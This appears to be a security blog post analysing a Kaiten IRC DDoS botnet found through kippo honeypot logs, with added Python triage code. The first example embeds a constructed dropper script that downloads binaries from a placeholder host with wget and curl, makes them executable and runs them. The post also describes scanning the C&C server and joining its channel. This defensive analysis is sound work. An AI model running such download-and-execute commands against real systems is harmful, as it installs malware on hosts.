While collecting stats from last month we made a nice discovery in the ssh logs from kippo (we are talking about gb.sh).
It first came up on our Splunk dashboard, and when we checked the link the file was still online. Curious to find out more about it, we started to dig in.
We learned that the shell script downloads another 6 precompiled files, gives them executable rights and, as a last step, starts them.
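That download, chmod, execute chain is the thing worth pulling out of such a dropper automatically, both to get the hosts to report and to confirm it really is a dropper. Below is an added example of that triage in Python; it is not code from this post or from kippo. The dropper text is constructed to mirror the behaviour described above: the host 203.0.113.5, the paths and every file name except armv51 are placeholders, not the real gb.sh.

```python
"""Static triage of a captured download-and-execute dropper script.

Added example, not code from the original post or from kippo. The script text
below is CONSTRUCTED to mirror the behaviour described above (fetch several
precompiled binaries, chmod them executable, start them); the host, paths and
all file names except armv51 are placeholders.
"""
import re
from urllib.parse import urlparse

CONSTRUCTED_DROPPER = """#!/bin/sh
# constructed sample, not the real gb.sh
cd /tmp || exit 1
wget http://203.0.113.5/bins/armv51
wget http://203.0.113.5/bins/mipsel
curl -O http://203.0.113.5/bins/x86
chmod +x armv51 mipsel x86
./armv51
./mipsel
./x86
rm -f gb.sh
"""

URL_RE = re.compile(r"https?://[^\s'\"]+")


def _basename(url):
    """Last path component of a URL, i.e. the file name the fetch will create."""
    return urlparse(url).path.rsplit("/", 1)[-1]


def triage_dropper(script):
    """Extract download URLs/hosts, chmod targets and launched files from a shell dropper.

    The interesting indicator is a file that goes through the full chain:
    downloaded, made executable, then executed.
    """
    urls, chmod_targets, executed = [], [], []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        urls.extend(URL_RE.findall(line))
        tokens = line.split()
        if tokens[0] == "chmod":
            # skip the mode argument (+x, 755, ...) and any flags; keep file names
            chmod_targets.extend(
                t for t in tokens[1:] if not t.startswith(("+", "-")) and not t.isdigit()
            )
        elif tokens[0].startswith("./"):
            executed.append(tokens[0][2:])
    downloaded = {_basename(u) for u in urls}
    full_chain = sorted(downloaded & set(chmod_targets) & set(executed))
    return {
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "chmod_targets": chmod_targets,
        "executed": executed,
        "download_chmod_exec": full_chain,
    }


def is_download_and_execute(script):
    """True when at least one file is fetched, chmod'ed and run by the script."""
    return bool(triage_dropper(script)["download_chmod_exec"])


if __name__ == "__main__":
    report = triage_dropper(CONSTRUCTED_DROPPER)
    print("hosts to report/block:", report["hosts"])
    print("download+chmod+exec chain:", report["download_chmod_exec"])
```

The host list is what goes to the abuse desk; the full-chain list tells you which downloaded files to go and disassemble first.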
It is time to fire up IDA and check what kind of binaries we have here.
The first file we disassembled was called ‘armv51’ and that was a direct hit! After investigation we found out that it actually is a compiled version of the Kaiten ddos bot. Not long after that we also dug up the irc information, including server + port and channel + password, that the bots use to join the C&C server.
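The server, channel and password sit in the binary as plain strings, which is why they fall out so quickly. Here is an added example of that strings-style triage in Python; it is not our IDA work and not Kaiten's code. The byte blob is constructed: an ELF-like header, a few IRC protocol format strings of the kind such a bot embeds, and placeholder values (server 192.0.2.10, password "s3cretpass"). Only the port 9001 and the channel #evil come from this post.

```python
"""Recover IRC C&C settings from a statically configured bot binary.

Added example of a strings-style triage; not the post's IDA work and not
Kaiten's code. The byte blob is CONSTRUCTED: an ELF-like header, a few IRC
protocol format strings, and placeholder values (server 192.0.2.10, password
"s3cretpass"). Only the port 9001 and the channel #evil come from the post.
"""
import ipaddress
import re

MIN_LEN = 4

CONSTRUCTED_BINARY = (
    b"\x7fELF\x01\x01\x01" + b"\x00" * 13
    + b"NICK %s\r\n\x00"
    + b"USER %s localhost localhost :%s\r\n\x00"
    + b"JOIN %s :%s\r\n\x00"
    + b"PRIVMSG %s :%s\r\n\x00"
    + b"192.0.2.10\x00"
    + b"#evil\x00"
    + b"s3cretpass\x00"
    + b"9001\x00"  # placed as a string here; real builds often compile the port in as an integer
)

IRC_COMMANDS = ("NICK ", "USER ", "JOIN ", "PRIVMSG ", "PONG ", "MODE ")


def extract_strings(blob, min_len=MIN_LEN):
    """Runs of printable ASCII at least min_len long, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def _is_ipv4(s):
    try:
        ipaddress.IPv4Address(s)
        return True
    except ValueError:
        return False


def find_irc_config(blob):
    """Classify extracted strings into C&C indicators.

    Heuristic (an assumption about how such bots lay out their config): the
    string stored right after the channel name is the most likely channel key.
    """
    strings = extract_strings(blob)
    protocol = [s for s in strings if s.startswith(IRC_COMMANDS)]
    channels = [s for s in strings if re.fullmatch(r"#[^\s,]+", s)]
    servers = [s for s in strings if _is_ipv4(s)]
    ports = [int(s) for s in strings if s.isdigit() and 1 <= int(s) <= 65535]
    key = None
    if channels:
        idx = strings.index(channels[0])
        if idx + 1 < len(strings):
            key = strings[idx + 1]
    return {
        "irc_protocol_strings": protocol,
        "servers": servers,
        "ports": ports,
        "channels": channels,
        "channel_key_candidate": key,
        "likely_irc_bot": len(protocol) >= 3 and bool(servers or channels),
    }


if __name__ == "__main__":
    for k, v in find_irc_config(CONSTRUCTED_BINARY).items():
        print(f"{k}: {v}")
```

An IP that shows up next to NICK/JOIN/PRIVMSG format strings is the C&C candidate; a real sample may store the port as a compiled-in integer, so a missing port string means "check the connect() argument in the disassembly", not "no port".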
The botnet is configured to connect by IP address and not by DNS name. Stupid? Yes! Hosting the botnet at OVH, stupid? Yes!
While gathering more information about the C&C server, nmap showed that several services are actually up:
21/tcp open ftp vsftpd 2.2.2
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
445/tcp filtered microsoft-ds
9001/tcp open irc Unreal ircd
Why do they need FTP? Maybe to spread? Connecting to the FTP as the anonymous user actually works, and there is one file to be found in the public directory, called ktx.c. This file happens to be the source of their binary, already preconfigured with their C&C server and the correct channel.
For port 80 we already know why it is up and running: they use it to spread the dropper script (gb.sh).
After setting up a proxy that could take a hit, it's time to connect to their irc server and see what these kiddies have running.
[Actual IRC logs]
> There are 594 users and 39 invisible on 1 servers
> 3 operator(s) online
> 2 channels formed
> I have 633 clients and 0 servers
> 633 945 Current local users 633, max 945
> 633 945 Current global users 633, max 945
> Successfully joined #evil on Saturday at 2:23pm
ERROR > 482: You’re not channel operator: #evil
> Channel Modes: +Mmnstu
It turns out to be controlled by 3 guys, who connect to the C&C server from their home IPs, unless those are adsl proxies. After monitoring the channel for several days, we see that the botnet is mainly built up of dsl lines and other home line types.
[Figure: top countries detected]
In 48 hours the botnet had been used for over 20 attacks; most of the target IPs resolved back to customer ISPs. 2 ddos attempts were fired at hosting companies.
Since the irc channel is in modes +Mmu, we could not communicate with the bots and remove the malware.
Looking back at the whole discovery and the information posted above, we did not expect a criminal group that would ddos companies to extort money. But don't think we are not looking for them =)
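For anyone reading the raw server replies rather than a client's pretty-printed log, here is an added example in Python that decodes the numerics shown above (251/252/254/255/265/266, the 324 mode reply and the 482 error) and explains why +Mmu stops a plain client from talking. It is not our IRC client or its logs. The server lines are constructed to reproduce the log: server name, nick and host are placeholders; the user counts, channel and modes are the ones from this post.

```python
"""Decode raw IRC server replies into the kind of summary the log above shows.

Added example, not the post's IRC client or its logs. The server lines are
CONSTRUCTED to reproduce the numerics in that log (RFC 1459/2812 numerics plus
the 265/266 local/global user counts and the 324 channel-mode reply); server
name, nick and host are placeholders, the counts, channel and modes are the post's.
"""

CONSTRUCTED_SERVER_LINES = [
    ":irc.example.net 251 bot :There are 594 users and 39 invisible on 1 servers",
    ":irc.example.net 252 bot 3 :operator(s) online",
    ":irc.example.net 254 bot 2 :channels formed",
    ":irc.example.net 255 bot :I have 633 clients and 0 servers",
    ":irc.example.net 265 bot 633 945 :Current local users 633, max 945",
    ":irc.example.net 266 bot 633 945 :Current global users 633, max 945",
    ":bot!bot@203.0.113.9 JOIN :#evil",
    ":irc.example.net 324 bot #evil +Mmnstu",
    ":irc.example.net 482 bot #evil :You're not channel operator",
]

NUMERIC_NAMES = {
    "251": "RPL_LUSERCLIENT", "252": "RPL_LUSEROP", "254": "RPL_LUSERCHANNELS",
    "255": "RPL_LUSERME", "265": "RPL_LOCALUSERS", "266": "RPL_GLOBALUSERS",
    "324": "RPL_CHANNELMODEIS", "482": "ERR_CHANOPRIVSNEEDED",
}

# Channel mode letters as documented for UnrealIRCd (the ircd nmap identified)
CHANNEL_MODES = {
    "M": "only registered users may talk",
    "m": "moderated: only ops/voiced users may talk",
    "n": "no messages from outside the channel",
    "s": "secret: hidden from /list",
    "t": "only ops may change the topic",
    "u": "auditorium: /names shows only ops",
}


def parse_line(line):
    """Split one IRC line into prefix, command, middle params and trailing param."""
    rest = line.rstrip("\r\n")
    prefix = None
    if rest.startswith(":"):
        prefix, rest = rest[1:].split(" ", 1)
    trailing = None
    if " :" in rest:
        rest, trailing = rest.split(" :", 1)
    tokens = rest.split()
    return {"prefix": prefix, "command": tokens[0], "params": tokens[1:], "trailing": trailing}


def summarize(lines):
    """Build a dashboard-style summary from a list of raw server lines."""
    summary = {"operators": None, "channels_formed": None, "local_users": None,
               "max_local_users": None, "channel_modes": {}, "joined": [], "errors": []}
    for line in lines:
        msg = parse_line(line)
        cmd, p = msg["command"], msg["params"]
        if cmd == "252":
            summary["operators"] = int(p[1])
        elif cmd == "254":
            summary["channels_formed"] = int(p[1])
        elif cmd == "265":
            summary["local_users"], summary["max_local_users"] = int(p[1]), int(p[2])
        elif cmd == "JOIN":
            summary["joined"].append(msg["trailing"] or p[0])
        elif cmd == "324":
            summary["channel_modes"][p[1]] = p[2].lstrip("+")
        elif cmd == "482":
            summary["errors"].append(f"{cmd} {NUMERIC_NAMES[cmd]}: {msg['trailing']}: {p[1]}")
    return summary


def can_ordinary_user_talk(modes):
    """False when +m or +M is set: a plain, unvoiced client cannot message the channel."""
    return not ({"m", "M"} & set(modes))


def explain_modes(modes):
    return [f"+{m}: {CHANNEL_MODES.get(m, 'unknown mode')}" for m in modes]


if __name__ == "__main__":
    s = summarize(CONSTRUCTED_SERVER_LINES)
    print(s)
    for chan, modes in s["channel_modes"].items():
        print(chan, "talk allowed:", can_ordinary_user_talk(modes))
        print("\n".join(explain_modes(modes)))
```

The 482 reply means the client has no ops on the channel, and with +m/+M set an unopped, unvoiced client is not allowed to send to it at all, so the only useful things to do from the inside are to watch the commands and take note of who issues them.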
Provider OVH has been informed about this.